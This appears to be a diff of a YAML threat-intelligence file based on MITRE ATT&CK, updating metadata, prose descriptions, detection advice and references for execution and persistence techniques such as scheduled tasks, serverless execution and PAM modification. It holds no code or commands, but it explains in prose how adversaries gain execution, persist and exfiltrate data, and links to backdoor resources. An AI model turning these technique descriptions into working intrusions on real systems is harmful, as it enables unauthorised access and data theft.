+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26432,28 +26810,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26464,32 +26825,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26532,12 +26905,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26594,11 +26966,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26663,14 +27034,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26691,14 +27061,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26707,16 +27082,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26742,6 +27119,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26756,29 +27141,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -26791,25 +27157,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -26859,17 +27241,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -26932,7 +27313,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -26966,8 +27347,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -26976,6 +27357,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26988,29 +27373,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -27057,7 +27442,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27089,8 +27474,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27104,6 +27489,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27116,16 +27505,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27188,7 +27580,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27253,49 +27644,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27310,20 +27662,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1574.007:
@@ -27413,7 +27802,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -27501,7 +27889,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -27586,11 +27973,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27668,7 +28054,6 @@ persistence:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1546.006:
@@ -27701,7 +28086,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
